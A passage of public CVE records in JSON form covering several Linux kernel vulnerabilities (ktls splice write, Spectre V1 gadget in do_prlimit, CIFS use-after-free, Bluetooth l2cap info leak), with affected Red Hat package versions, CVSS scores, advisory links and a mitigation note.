"status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::appstream", "cpe:/a:redhat:rhel_eus:9.0::crb", "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.2.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::nfv", "cpe:/a:redhat:rhel_eus:9.0::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.1.rt21.165.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-22", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-11", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-407", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-479", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-247", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-5", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-227", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-470", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-14", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-2", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-24", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-10", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-525", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-224", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-56", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-07T06:30:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds memory write flaw was found in the Linux kernel\u2019s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-1314", "description": "Missing Write Protection for Parametric Data Values", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-16T14:59:44.174Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0850", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0850" }, { "name": "RHSA-2024:0851", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0851" }, { "name": "RHSA-2024:0876", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0876" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1251", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1251" }, { "name": "RHSA-2024:1253", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1253" }, { "name": "RHSA-2024:1268", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1268" }, { "name": "RHSA-2024:1269", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1269" }, { "name": "RHSA-2024:1278", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1278" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1367", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1367" }, { "name": "RHSA-2024:1368", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1368" }, { "name": "RHSA-2024:1377", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1377" }, { "name": "RHSA-2024:1382", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1382" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0646" }, { "name": "RHBZ#2253908", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267" } ], "timeline": [ { "lang": "en", "time": "2024-01-17T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-07T06:30:00+00:00", "value": "Made public." } ], "title": "Kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module tls from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-1314: Missing Write Protection for Parametric Data Values" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-0646", "datePublished": "2024-01-17T15:16:45.148Z", "dateReserved": "2024-01-17T13:11:12.669Z", "dateUpdated": "2024-10-16T14:59:44.174Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0458
Vulnerability from cvelistv5
Published
2023-04-26 18:03
Modified
2024-08-02 05:10
Severity ?
EPSS score ?
Summary
Spectre V1 Gadget in do_prlimit in the Linux Kernel
References
Impacted products
▼ | Vendor | Product |
---|---|---|
Linux | Linux Kernel |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:10:56.346Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/diff/kernel/sys.c?id=v6.1.8\u0026id2=v6.1.7" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/739790605705ddcf18f21782b9c99ad7d53a8c11" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Linux Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "6.1.8", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "datePublic": "2023-01-21T20:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "A speculative pointer dereference problem exists in the Linux Kernel on the do_prlimit() function. The resource argument value is controlled and is used in pointer arithmetic for the \u0027rlim\u0027 variable and can be used to leak the contents. We recommend upgrading past version 6.1.8 or commit\u0026nbsp;739790605705ddcf18f21782b9c99ad7d53a8c11" } ], "value": "A speculative pointer dereference problem exists in the Linux Kernel on the do_prlimit() function. The resource argument value is controlled and is used in pointer arithmetic for the \u0027rlim\u0027 variable and can be used to leak the contents. We recommend upgrading past version 6.1.8 or commit\u00a0739790605705ddcf18f21782b9c99ad7d53a8c11" } ], "impacts": [ { "capecId": "CAPEC-129", "descriptions": [ { "lang": "en", "value": "CAPEC-129 Pointer Manipulation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-26T18:03:11.815Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/diff/kernel/sys.c?id=v6.1.8\u0026id2=v6.1.7" }, { "url": "https://github.com/torvalds/linux/commit/739790605705ddcf18f21782b9c99ad7d53a8c11" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "source": { "discovery": "INTERNAL" }, "title": "Spectre V1 Gadget in do_prlimit in the Linux Kernel", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-0458", "datePublished": "2023-04-26T18:03:11.815Z", "dateReserved": "2023-01-24T09:43:28.025Z", "dateUpdated": "2024-08-02T05:10:56.346Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1192
Vulnerability from cvelistv5
Published
2023-11-01 19:01
Modified
2024-08-02 05:40
Severity ?
EPSS score ?
Summary
Use-after-free in smb2_is_status_io_timeout()
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-1192 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2154178 | issue-tracking, x_refsource_REDHAT | |
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d527f51331cace562393a8038d870b3e9916686f |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:40:59.686Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-1192" }, { "name": "RHBZ#2154178", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2154178" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d527f51331cace562393a8038d870b3e9916686f" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "kernel", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "kernel", "product": "Fedora", "vendor": "Fedora" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Pumpkin (@u1f383), working with DEVCORE Internship Program for reporting this issue." } ], "datePublic": "2022-10-02T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in smb2_is_status_io_timeout() in CIFS in the Linux Kernel. After CIFS transfers response data to a system call, there are still local variable points to the memory region, and if the system call frees it faster than CIFS uses it, CIFS will access a free memory region, leading to a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Low" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-07T16:42:37.540Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-1192" }, { "name": "RHBZ#2154178", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2154178" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d527f51331cace562393a8038d870b3e9916686f" } ], "timeline": [ { "lang": "en", "time": "2022-12-16T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2022-10-02T00:00:00+00:00", "value": "Made public." } ], "title": "Use-after-free in smb2_is_status_io_timeout()", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-416: Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1192", "datePublished": "2023-11-01T19:01:47.336Z", "dateReserved": "2023-03-06T08:43:46.689Z", "dateUpdated": "2024-08-02T05:40:59.686Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42895
Vulnerability from cvelistv5
Published
2022-11-23 14:11
Modified
2024-08-03 13:19
Severity ?
EPSS score ?
Summary
Info Leak in l2cap_core in the Linux Kernel
References
Impacted products
▼ | Vendor | Product |
---|---|---|
Linux | Linux Kernel |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:19:05.390Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/#b1a2cd50c0357f243b7435a732b4e62ba3157a2e" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Linux Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "b1a2cd50c0357f243b7435a732b4e62ba3157a2e", "status": "affected", "version": "3.0.0", "versionType": "custom" } ] } ], "datePublic": "2022-11-02T23:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThere is an infoleak vulnerability in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_parse_conf_req function which can be used to leak kernel pointers remotely.\u003c/span\u003e\u003cbr\u003eWe recommend upgrading past commit\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw1MgsfyPTiSrqqs3LAs-ZRS\"\u003ehttps://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e" } ], "value": "There is an infoleak vulnerability in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_parse_conf_req function which can be used to leak kernel pointers remotely.\nWe recommend upgrading past commit\u00a0 https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url \n\n" } ], "impacts": [ { "capecId": "CAPEC-410", "descriptions": [ { "lang": "en", "value": "CAPEC-410 Information Elicitation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-824", 